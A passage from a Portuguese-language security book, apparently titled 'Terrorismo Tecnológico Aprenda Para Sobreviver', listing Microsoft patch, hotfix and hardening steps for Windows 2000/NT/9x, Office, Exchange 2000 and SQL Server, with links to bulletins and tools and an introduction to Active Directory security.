(http://www.microsoft.com/technet/security/current.asp?produc
tid=5&servicepackid=0)
6. Consulte a seção Security do Windows 2000 Resource Kit
para configurar a rede e a segurança na Internet.
7. Consulte Security Newsgroups para aprender como outros
usuários resolvem seus requisitos de segurança.
8. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp).
20.3 Desktops com Windows NT 4.0
Terrorismo Tecnológico Aprenda Para Sobreviver
360
1. Familiarize-se com este guia sobre como obter segurança e
manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/bestprac/bpentsec.asp)
2. Verifique com freqüência o serviço Windows Update
(http://windowsupdate.microsoft.com/). Como alternativa para
administradores de sistema, o Catálogo do Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Use o conjunto de ferramentas de configuração do sistema da
Microsoft
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/deploy/confeat/securcon.asp) para configurar a segurança
do sistema e realizar análises periódicas.
4. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
(http://www.microsoft.com/technet/security/current.asp?produc
tid=54)
5. Consulte a seção Security do Windows NT Resource Kit para
configurar a rede e a segurança na Internet.
Terrorismo Tecnológico Aprenda Para Sobreviver
361
6. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus.
(http://www.microsoft.com/technet/security/virus/virus.asp)
20.4 Desktops com Windows 9X, SE e ME
1. Familiarize-se com este guia sobre como obter segurança e
manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Verifique com freqüência o serviço Windows Update.
(http://windowsupdate.microsoft.com/) Como alternativa para
administradores de sistema, o Catálogo do Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp)
20.5 Manutenção de segurança contínua
Terrorismo Tecnológico Aprenda Para Sobreviver
362
Sem a manutenção contínua, o seu sistema pode se tornar
vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:
• Use a ferramenta Hfnetchk
(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
• Inscreva-se no Microsoft Security Notification Service.
(http://www.microsoft.com/technet/security/bulletin/notify.asp)
Esse é um serviço gratuito de notificação por email que a
Microsoft utiliza para enviar informações aos assinantes sobre
a segurança dos produtos da Microsoft.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) para reunir os hotfixes, de forma que somente uma
reinicialização seja necessária durante a instalação de várias
correções.
Terrorismo Tecnológico Aprenda Para Sobreviver
363
20.6 Desktops com Office
1. Mantenha o sistema atualizado automaticamente por meio do
site Office Update em
http://office.microsoft.com/brasil/productupdates/default.aspx.
o Para administradores de sistemas, o Centro de
download
(http://office.microsoft.com/brasil/Downloads/default.asp
x) do Office permite selecionar as atualizações que
precisam de download e obter uma versão que pode
ser distribuída pela empresa.
2. Consulte a área Office Security na Microsoft TechNet
(http://microsoft.com/technet/security/default.asp) para
acessar uma lista abrangente de boletins de hotfixes e
segurança para sua versão do Microsoft Office.
3. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
(http://www.microsoft.com/technet/security/current.asp)
4. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus.
(http://www.microsoft.com/technet/security/virus/virus.asp)
Terrorismo Tecnológico Aprenda Para Sobreviver
364
20.7 Servidores Exchange 2000
1. Antes de começar: atualize os servidores que estiverem
executando o Exchange 2000, o Active Directory Connector e
o Exchange Conferencing e todos os controladores de
domínio e os servidores de catálogo global para o Windows
2000 Service Pack 2.
1.1 Instale o Windows 2000 Service Pack (http://www.microsoft.com/windows2000/downloads/servicepa
cks/sp2/default.asp) mais recente. Siga o Microsoft Windows 2000 Service Pack (http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/support/spdeploy.asp) Installation and Deployment Guide (site em inglês) para obter informações detalhadas sobre
como instalar o Service Pack.
Instale os hotfixes pós-SP2 críticos para o Windows 2000.
1.2 Instale o Security Rollup Package (SRP1).
Q311401 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401), "Windows 2000 Security Rollup Package 1
Terrorismo Tecnológico Aprenda Para Sobreviver
365
(SRP1)", lançado em 30 de janeiro de 2002. O Windows 2000
SRP1 ultrapassa o Windows 2000 SP2 e deve ser aplicado.
1.3 Instale o SNMP Security Update.
Q314147 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002
1.4 Instale o Patch de segurança: SMTP Rollup.
Q313450 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q313450) , "Windows 2000 Security Patch: SMTP Rollup"
(site em inglês), lançado em 27 de fevereiro de 2002
1.5 Execute o IIS Lockdown Wizard.
A Microsoft lançou uma versão atualizada do IIS Lockdown Wizard versão 2.1 (http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/Default.asp) (site em inglês), que fornece
modelos para os principais produtos Microsoft dependentes
do IIS. O IIS Lockdown Wizard desativa recursos
desnecessários, reduzindo assim a superfície de ataque
Terrorismo Tecnológico Aprenda Para Sobreviver
366
disponível a invasores. Para fornecer uma defesa satisfatória
ou várias camadas de proteção contra invasores, o URLscan,
com modelos personalizados para cada função de servidor
com suporte, foi integrado ao IIS Lockdown Wizard.
Para fazer o download da ferramenta,
(http://www.microsoft.com/Downloads/Release.asp?ReleaseI
D=33961) (site em inglês)
1.6 Faça o download e execute o Microsoft Baseline Security Analyzer (MBSA) (http://support.microsoft.com/view/tn.asp?kb=320454) para
obter um relatório sobre os problemas de configuração de
segurança mais comuns.
Para obter mais informações sobre a segurança do Windows
2000,
http://www.microsoft.com/technet/security/tools/chklst/wsrvsec
.asp (site em inglês)
2. Instale o Exchange 2000 Service Pack (http://www.microsoft.com/exchange/downloads/2000/sp2/def
ault.asp) mais recente
Siga este guia:
Terrorismo Tecnológico Aprenda Para Sobreviver
367
a. Se for uma instalação sem cluster, siga o Exchange 2000 Service Pack 2 Deployment Guide http://www.microsoft.com/exchange/techinfo/deploymen
t/2000/SP2Deployment.asp).
b. Se for uma instalação em cluster, siga o guia
Deploying Microsoft Exchange 2000 Server Service Pack 2 Clusters (http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/prodtechnol/exchange/support/sp2ClustGd/
1-Intro.asp ) (site em inglês).
3. Instale os hotfixes pós-SP2 do Exchange 2000 relevantes
(sites em inglês):
3.1 Q316056 (http://support.microsoft.com/view/tn.asp?kb=316056) XGEN:
Exchange 2000 Server Post-SP2 Admin Fixes Available
3.2 Q315911 (http://support.microsoft.com/view/tn.asp?kb=3159110 XGEN:
Exchange 2000 Server Post-SP2 MTA Fixes Available
3.3 Q316463 (http://support.microsoft.com/view/tn.asp?kb=316463) XGEN:
Exchange 2000 Server Post-Service Pack 2 Directory Fixes A
Terrorismo Tecnológico Aprenda Para Sobreviver
368
3.4 Q316465 (http://support.microsoft.com/view/tn.asp?kb=316465) XGEN:
Exchange 2000 Server Post-Service Pack 2 CDO Fixes
3.5 Q316664 (http://support.microsoft.com/view/tn.asp?kb=316664) XGEN:
Exchange 2000 Server Post-Service Pack 2 Protocols Fixes
3.6 Q317323 (http://support.microsoft.com/view/tn.asp?kb=317323) XGEN:
Exchange 2000 Server Post-Service Pack 2 Transport Fixes
Para obter uma lista dos artigos sobre hotfix pós-SP2 do
Microsoft Exchange 2000 Server, vá em
http://support.microsoft.com/view/tn.asp?kb=301378 site em
inglês)
Exchange 2000 Conferencing Server
Para obter informações adicionais sobre como adquirir os
pacotes de serviços do Exchange 2000 Conferencing Server,
clique no número do artigo a seguir para exibi-lo no Microsoft
Knowledge Base:
Q302473 (http://support.microsoft.com/view/tn.asp?kb=302473) XGEN:
Terrorismo Tecnológico Aprenda Para Sobreviver
369
How to Obtain the Latest Exchange 2000 Conferencing Server
Service Pack
4. Fique atualizado com os hotfixes de segurança mais recentes
usando Security Bulletins Search 5. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp) (site em inglês) regularmente.
Manutenção de segurança contínua
Sem a manutenção contínua, o seu sistema pode se tornar
vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:
• Use a ferramenta Hfnetchk
(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
Terrorismo Tecnológico Aprenda Para Sobreviver
370
• Inscreva-se no Microsoft Security Notification Service
(http://www.microsoft.com/technet/security/bulletin/notify.asp)
(site em inglês). Esse é um serviço gratuito de notificação por
email que a Microsoft utiliza para enviar informações aos
assinantes sobre a segurança dos produtos da Microsoft.
• Use o site Windows Update
(http://windowsupdate.microsoft.com/) (site em inglês) para
verificar as atualizações recomendáveis e críticas mais
recentes.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) (site em inglês) para reunir os hotfixes, de forma que
somente uma reinicialização seja necessária durante a
instalação de várias correções.
Para obter mais informações
Estas são informações adicionais sobre como manter seus
servidores Exchange seguros:
Configuration and Security Update Recommendations for Exchange 2000 (http://www.microsoft.com/Exchange/techinfo/deployment/2000/Best
Config.asp)
Terrorismo Tecnológico Aprenda Para Sobreviver
371
Home page do Microsoft Baseline Security Analyzer (http://www.microsoft.com/technet/security/tools/tools/mbsahome.as
p)
Como parte do Strategic Technology Protection Program da
Microsoft e em resposta à necessidade direta do consumidor de
obter um método fácil de identificação de problemas de segurança
comuns, a Microsoft desenvolveu o Microsoft Baseline Security
Analyzer (MBSA).
Home page do Microsoft Baseline Security Analyzer (http://www.microsoft.com/technet/security/tools/tools/mbsawp.asp)
Perguntas e respostas do Microsoft Baseline Security Analyzer (MBSA) Versão 1.0 (http://www.microsoft.com/technet/security/tools/tools/mbsaqa.asp)
Planejamento e instalação do Exchange 2000 Server Chapter 13 – System Security (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kplan/c13secur.asp)
Exchange 2000 Server Resource Kit Chapter 24 - Security Sensitive Environments (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00
res/deploygd/part5/c24secur.asp)
Terrorismo Tecnológico Aprenda Para Sobreviver
372
Exchange 2000 Server Resource Kit Chapter 30 – Security (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00
res/resguide/c30scrty.asp)
Exchange 2000 Server Upgrade Series - Planning Guide Chapter 6 - Constructing Security and Administrative Models (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/p_06_tt1.asp)
Exchange 2000 Server Upgrade Series - Planning Guide Chapter 9 - Ensuring Messaging Security (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/p_09_tt1.asp)
Exchange 2000 Server Upgrade Series - Planning Guide Glossary - Exchange 2000, Windows 2000 And Security Glossary (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/glossary.asp)
Leveraging Security Features in Windows 2000 for Exchange (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe
atusability/leversec.asp)
Web Storage System Security Roles (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe
atusability/secroles.asp)
Terrorismo Tecnológico Aprenda Para Sobreviver
373
Exchange Server 5.5 Security (http://www.microsoft.com/technet/security/prodtech/exc10.asp)
Exchange Server 5.5 Resource Guide Part 11 – Security (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex55
res/exc10.asp)
Exchange Server 5.5, 24 seven , publicado pela Sybex Inc.
Exchange Server Advanced Security (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/o
ptimize/advan.asp)
Noções básicas desde 1999: Enhancing Microsoft Exchange Server's Security (http://www.microsoft.com/technet/prodtechnol/exchange/support/ex
chsec.asp)
Artigos relevantes da Knowledge Base
XCCC: IIS Lockdown and URLscan Configurations in Exchange
Environment. (Q309508)
(http://support.microsoft.com/view/tn.asp?kb=309508)
As ferramentas de segurança de serviços de informações da
Internet (IIS), IISlockD e URLscan, devem ser configuradas de forma
apropriada para o Exchange. Este artigo descreve a configuração
Terrorismo Tecnológico Aprenda Para Sobreviver
374
necessária para essas ferramentas nos ambientes do Exchange
2000 Server e do Exchange Server 5.5.
XADM: Security of Exchange 2000 for Exchange Domain Servers
Group (Q313807)
(http://support.microsoft.com/view/tn.asp?kb=313807)
Este artigo descreve como obter e usar um script que restringe o
acesso aos grupos Exchange Domain Servers em uma floresta.
Uma instalação padrão do Exchange cria um grupo Exchange
Domain Servers para cada domínio da floresta. Esse grupo contém
as contas de computador para cada servidor Exchange de um
determinado domínio. Os grupos têm acesso a todo o
armazenamento de caixa de correio e pasta pública do Exchange na
floresta. Talvez, os clientes desejem conceder acesso a
armazenamentos de caixa de correio somente ao servidor local que
hospeda os armazenamentos.
PROCEDIMENTOS: Use SMTP Connectors to Connect Routing
Groups (Q319407)
(http://support.microsoft.com/view/tn.asp?kb=319407)
Você pode usar um conector SMTP para conectar o computador
com Exchange 2000 a computadores SMTP não-Exchange Server,
como computadores na Internet. Você também pode usar um
conector SMTP para conectar grupos de roteamento do Exchange
Terrorismo Tecnológico Aprenda Para Sobreviver
375
Server em cenários onde conectores SMTP não são adequados, por
exemplo, caso a conexão entre os grupos de roteamento não for
permanente ou caso a conexão precise rotear para Internet. A
configuração de conectores SMTP é um pouco mais complexa do
que a configuração de conectores de grupo de roteamento e não
transmitem automaticamente informações de estado de conexão do
Exchange Server.
PROCEDIMENTOS: Secure SMTP Client Message Delivery in
Exchange 2000 (Q319267) (http://support.microsoft.com/view/tn.asp?kb=3192670)
Este artigo descreve passo a passo como criptografar a entrega de
email de protocolo de transferência de correio simples (SMTP) para
conexões de entrada de cliente (POP3 e IMAP4) em computadores
com Exchange 2000, de modo que os usuários possam autenticar e
receber material potencialmente sensível sem que o nome de
usuário, a senha ou o conteúdo da mensagem corram o risco de
serem interceptados.
PROCEDIMENTOS: Secure IMAP Client Access in Exchange 2000
(Q319278) (http://support.microsoft.com/view/tn.asp?kb=319278)
Este artigo descreve passo a passo como configurar a segurança
para conexões de entrada de protocolo de acesso a mensagens da
Internet versão 4 (IMAP4) em computadores com Exchange 2000,
de modo que os usuários possam autenticar e receber material
Terrorismo Tecnológico Aprenda Para Sobreviver
376
potencialmente sensível sem que o nome de usuário, a senha ou o
conteúdo da mensagem corram o risco de serem interceptados.
PROCEDIMENTOS: Secure Post Office Protocol Client Access in
Exchange (Q319273) (http://support.microsoft.com/view/tn.asp?kb=319273)
20.8 Mantendo o SQL Seguro
Antes de começar: você deve atualizar os servidores que
estiverem executando o SQL Server para o Windows 2000 Service
Pack 2.
Instale o Windows 2000 Service Pack mais recente (http://www.microsoft.com/windows2000/downloads/servicepa
cks/sp2/default.asp ) (site em inglês). Siga o Microsoft Windows 2000 Service Pack Installation and Deployment Guide (http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/support/spdeploy.asp) (site em inglês) para obter
informações detalhadas sobre como instalar o Service Pack.
Você também deve instalar os hotfixes pós-SP2 críticos para o
Windows 2000.
1. Instale o Security Rollup Package.
Terrorismo Tecnológico Aprenda Para Sobreviver
377
Q311401 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401) "Windows 2000 Security Rollup Package 1
(SRP1)" (site em inglês), lançado em 30 de janeiro de 2002
2. Instale o SNMP Security Update.
Q314147 (http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002
3. Execute o IIS Lockdown Wizard.
A Microsoft lançou uma versão atualizada do IIS Lockdown Wizard versão 2.1 (http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/Default.asp) (site em inglês), que fornece
modelos para os principais produtos Microsoft dependentes
do IIS. O IIS Lockdown Wizard desativa recursos
desnecessários, reduzindo assim a superfície de ataque
disponível a invasores. Para fornecer uma defesa satisfatória
ou várias camadas de proteção contra invasores, o URLscan,
com modelos personalizados para cada função de servidor
com suporte, foi integrado ao IIS Lockdown Wizard.
Terrorismo Tecnológico Aprenda Para Sobreviver
378
Para fazer o download da ferramenta, vá para
http://www.microsoft.com/Downloads/Release.asp?ReleaseID
=33961 (site em inglês)
4. Faça o download e execute o Microsoft Baseline Security
Analyzer (MBSA)
(http://support.microsoft.com/view/tn.asp?kb=320454) (site em
inglês) para obter um relatório sobre os problemas de
configuração de segurança comuns.
Para obter mais informações sobre a segurança do Windows 2000, vá para (http://www.microsoft.com/technet/security/tools/chklst/wsrvsec.asp) (site em inglês)
20.9 Servidores SQL Server 2000
Instale o SQL Server 7.0 Service Pack (http://www.microsoft.com/sql/downloads/2000/sp2.asp) (site em inglês) mais recente
Se for uma instalação sem cluster, siga estas etapas:
1. Faça backup dos bancos de dados do SQL Server
2. Faça backup dos bancos de dados do Analysis Services
3. Certifique-se de que os bancos de dados do sistema têm
espaço livre suficiente
Terrorismo Tecnológico Aprenda Para Sobreviver
379
4. Pare serviços e aplicativos antes de executar a instalação do
SP2
5. Instale o Database Components SP2
6. Instale o Analysis Services SP2
7. Instale o Desktop Engine SP2
8. Reinicie os serviços
9. Reinicie os aplicativos
As etapas descritas acima encontram-se no Leiame do SQL Server 2000 Service Pack 2 (http://support.microsoft.com/support/servicepacks/SQL/2000/SP2R
eadMe.asp) (site em inglês)
Se for uma instalação em cluster com failover, siga as etapas na
seção 3.10 "Installing on a Failover Cluster" do Leiame do SQL Server 2000 Service Pack 2 (http://support.microsoft.com/default.aspx?scid=http://support.micros
oft.com/support/servicepacks/SQL/2000/SP2ReadMe.asp#_3.10_ins
talling_on_a_failover_clusterhttp://support.microsoft.com/default.asp
x?scid=http://support.microsoft.com/suppo) (site em inglês)
Observação O SQL Server 2000 SP2 contém uma correção
adicional para English Query que você precisará aplicar
separadamente. Para obter mais informações sobre essa correção,
consulte "FIX: Potential English Query Security Issue" Q297105
Terrorismo Tecnológico Aprenda Para Sobreviver
380
(http://support.microsoft.com/view/tn.asp?kb=297105) (site em
inglês)
Observação Os usuários do SQL Server 2000 Windows CE Edition que atualizarem os servidores de editor e banco de dados
do SQL Server 2000 para a versão Service Pack 2 (SP2) também
deverão atualizar os componentes de replicação dos servidores do Internet Information Services (IIS) (http://www.microsoft.com/sql/downloads/CE/sp2.asp)
Instale os hotfixes pós-SP2 do SQL Server 2000 que sejam
relevantes
Faça o download e instale o SQL Server 2000 Security Update for Service Pack 2 (http://support.microsoft.com/view/tn.asp?kb=316333) (site em
inglês)
Observe que a Microsoft distribui correções de segurança do SQL
Server 2000 por um arquivo do qual você pode fazer download.
Como as correções de segurança são cumulativas, cada nova
versão contém todas as correções de segurança incluídas na versão
anterior de correções de segurança do SQL Server 2000.
Para obter uma lista dos artigos sobre hotfixes pós-SP2 do Microsoft SQL Server 2000, vá para: (http://support.microsoft.com/default.aspx?scid=kb;EN-US;q290211) (site em inglês)
Terrorismo Tecnológico Aprenda Para Sobreviver
381
20.10 Servidores SQL Server 7.0
Instale o SQL Server 2000 Service Pack (http://www.microsoft.com/sql/downloads/sp4.asp) mais recente
Para obter mais informações sobre SQL Server 7.0 Service Packs,
consulte: Q301511 (http://support.microsoft.com/view/tn.asp?kb=301511) INF: How to Obtain the Latest SQL Server 7.0 Service Pack (site em inglês)
Siga as etapas descritas no capítulo 3 de INF: Readme.txt Files for SQL Server 7.0 Service Packs (Q321817) (http://support.microsoft.com/view/tn.asp?kb=321817) (site em
inglês)
Observação O SQL Server 7.0 SP4 não inclui atualizações para os
componentes dos serviços de processamento analítico on-line
(OLAP) do SQL Server 7.0. Para obter as atualizações mais
recentes desses componentes, faça o download da parte OLAP do
SQL Server 7.0 Service Pack 3 (http://www.microsoft.com/sql/downloads/sp3.asp)
Observe que SQL Server Security Patch (http://support.microsoft.com/default.aspx?scid=http://support.micros
oft.com/support/sql/xp_security.asp) (site em inglês) está incluído no
SQL Server 7.0 Service Pack 4
Terrorismo Tecnológico Aprenda Para Sobreviver
382
Mantenha-se atualizado a respeito dos hotfixes de segurança mais
recentes do SQL Server usando o HotFix & Security Bulletin Service (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/current.asp?productid=30&servicepackid=0) (site em inglês)
SQL Server 2000
Abril de 2002
MS02-020: SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507) (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-020.asp) (site em inglês)
Este problema foi corrigido primeiro no Microsoft SQL Server 2000
Service Pack 2.
Fevereiro de 2002
MS02-007: SQL Server Remote Data Source Function Contain Unchecked Buffers (http://www.microsoft.com/technet/security/bulletin/MS02-
007.asp)(site em inglês)
O patch para essa questão está disponível no SQL Server 2000
Security Update for Service Pack 2
Terrorismo Tecnológico Aprenda Para Sobreviver
383
Dezembro de 2001
MS01-060: SQL Server Text Formatting Functions Contain Unchecked Buffers (http://www.microsoft.com/technet/security/bulletin/MS01-060.asp) (site em inglês)
Este problema foi corrigido primeiro no SQL Server 2000 Service
Pack 2.
Julho de 2001
MS01-041: Malformed RPC Request Can Cause Service Failure (http://www.microsoft.com/technet/security/bulletin/MS01-041.asp) (site em inglês)
Este problema foi corrigido primeiro no SQL Server 2000 Service
Pack 1.
Junho de 2001
MS01-032: SQL Query Method Enables Cached Administrator Connection to be Reused (http://www.microsoft.com/technet/security/bulletin/MS01-032.asp) (site em inglês)
Este problema foi corrigido primeiro no SQL Server 2000 Service
Pack 1.
Terrorismo Tecnológico Aprenda Para Sobreviver
384
Dezembro de 2000
MS00-092: Extended Stored Procedure Parameter Parsing Vulnerability (http://www.microsoft.com/technet/security/bulletin/MS00-092.asp)
(site em inglês)
Este problema foi corrigido primeiro no SQL Server 2000 Service
Pack 1.
SQL Server 7.0
Abril de 2002
MS02-020: SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507) (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-020.asp) (site em inglês)
Este problema foi corrigido primeiro no Microsoft SQL Server 7.0
Service Pack 4.
Fevereiro de 2002
MS02-007: SQL Server Remote Data Source Function Contain Unchecked Buffers (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-007.asp) (site em inglês)
Terrorismo Tecnológico Aprenda Para Sobreviver
385
Este problema foi corrigido primeiro no Microsoft SQL Server 7.0
Service Pack 4.
Dezembro de 2001
MS01-060: SQL Server Text Formatting Functions Contain Unchecked Buffers (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS01-060.asp) (site em inglês)
Este problema foi corrigido primeiro no Microsoft SQL Server 7.0
Service Pack 4.
Junho de 2001
MS01-032: SQL Query Method Enables Cached Administrator Connection to be Reused (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS01-032.asp) (site em inglês)
Este problema foi corrigido primeiro no Microsoft SQL Server 7.0
Service Pack 4.
Atualize as ferramentas antivírus e os arquivos de assinatura de
vírus. Verifique os alertas de vírus (http://www.microsoft.com/technet/security/virus/virus.asp) (site em
inglês) regularmente.
Terrorismo Tecnológico Aprenda Para Sobreviver
386
Manutenção de segurança contínua
Sem a manutenção contínua, o seu sistema pode se tornar
vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:
• Use a ferramenta Hfnetchk
(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
• Inscreva-se no Microsoft Security Notification Service
(http://www.microsoft.com/technet/security/bulletin/notify.asp)
(site em inglês). Esse é um serviço gratuito de notificação por
email que a Microsoft utiliza para enviar informações aos
assinantes sobre a segurança dos produtos da Microsoft.
• Use o site Windows Update
(http://windowsupdate.microsoft.com/) (site em inglês) para
Terrorismo Tecnológico Aprenda Para Sobreviver
387
verificar as atualizações recomendáveis e críticas mais
recentes.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) (site em inglês) para reunir os hotfixes, de forma que
somente uma reinicialização seja necessária durante a
instalação de várias correções.
Para obter mais informações
Veja a seguir informações adicionais sobre como manter seus servidores SQL Server protegidos:
20.11 Segurança do SQL Server 2000
SQL Server Security on TechNet (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/default.asp) (site em inglês)
SQL Server 2000 Operations Guide Chapter 3 - Security Administration (http://www.microsoft.com/technet/prodtechnol/sql/maintain/operate/
opsguide/sqlops3.asp) (site em inglês)
Terrorismo Tecnológico Aprenda Para Sobreviver
388
SQL Server 2000 C2 Administrator's and User's Security Guide (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
sqlc2.asp) (site em inglês)
SQL Server 2000 Security White Paper (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
sql2ksec.asp) (site em inglês)
SQL Server 2000 Resource Kit Chapter 10 - Implementing Security (http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql2000/par
t3/c1061.asp) (site em inglês)
Microsoft SQL Server 2000 Security (http://www.microsoft.com/technet/prodtechnol/sql/deploy/confeat/05
ppcsqa.asp) no capítulo 5 de SQL Server 2000 Administrator's Pocket Consultant (http://www1.fatbrain.com/asp/bookinfo/bookinfo.asp?theisbn=07356
11297&p=technet&s=29736) (sites em inglês) de William R. Stanek
SQL Server 7.0 Administrator's Companion Chapter 7 - Managing Security (http://www.microsoft.com/technet/prodtechnol/sql/proddocs/adminc
mp/75517c07.asp) (site em inglês)
Terrorismo Tecnológico Aprenda Para Sobreviver
389
SQL Server 7.0 Resource Guide Chapter 16 - Product Security (http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql7res/part
10/sqc15.asp) (site em inglês)
SQL Server 7.0 Security White Paper (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/
secure.asp) (site em inglês)
INF: List of Bugs Fixed by SQL Server 7.0 Service Packs (http://support.microsoft.com/view/tn.asp?kb=313980) (site em
inglês)
20.12 Segurança em servidores com o Win 2000 Server Tivemos a pouco tempo o lançamento do Windows 2003 Server mas as mudanças não são tantas e muitos dos recurso de segurança em um S.O. se repete no outro com pouquíssimas mudanças. • No Active Directory pode ser feita toda a política de segurança
de domínio e conta. O Active Directory, que proporciona replicação e disponibilidade de informação de conta para múltiplos Controladores de Domínio, está disponível para administração remota, suportando um espaço de nome hierárquico para informação de conta de usuário, grupo e de computador.
Active Directory e Segurança
Terrorismo Tecnológico Aprenda Para Sobreviver
390
Parte deste documento a seguir foi retirado o próprio Site da Microsoft mostrando os recursos de segurança do Active Directory no final do texto há informações para uma pesquisa mais avançada. Informação de conta no Windows NT é mantida atualmente com o uso de uma porção segura do registry nos controladores de domínio. Usando trust de domínio e autenticação pass-through, uma hierarquia de dois níveis de domínios proporciona alguma flexibilidade par a a organização do gerenciamento de contas e recursos de servidor; entretanto, as contas são mantidas em um espaço de nome flat sem nenhuma organização interna. Serviços de Segurança Distribuída Windows 2000 usam o Active Directory como o repositório para informação de conta. O Active Directory proporciona melhoria significativa na implementação baseada em registry, nas áreas de performance e escalabilidade, e oferece um ambiente administrativo com ricas funcionalidades. O diagrama seguinte mostra a estrutura hierárquica para uma árvore de domínios Windows 2000, e o contexto de nomes hierárquicos em cada domínio usando unidades organizacionais (OUs) como recipientes de objetos de diretório.
Terrorismo Tecnológico Aprenda Para Sobreviver
391
Domain Hierarchy: Domain TreeOrganizational Unit (OU) hierarchywithin a Domain
Users, Groups, Machines,Printers, etc.
OU
OU
Users
Figura 1. Estrutura hierárquica do Active Directory
Vantagens do Gerenciamento de Conta do Active Directory As vantagens da integração do gerenciamento de conta de segurança com o Active Directory são: • Contas para usuários, grupos e máquinas podem ser
organizadas em recipientes de diretório chamados unidades organizacionais (OUs). Um domínio pode ter qualquer número de OUs organizadas em um espaço de nome estruturado em árvores. Empresas podem organizar o espaço de nome para informação de conta para representar os departamentos e organizações na empresa. Contas de usuário, assim como OUs, são objetos de diretório que podem ser renomeados facilmente na árvore de domínio com as mudanças na organização.
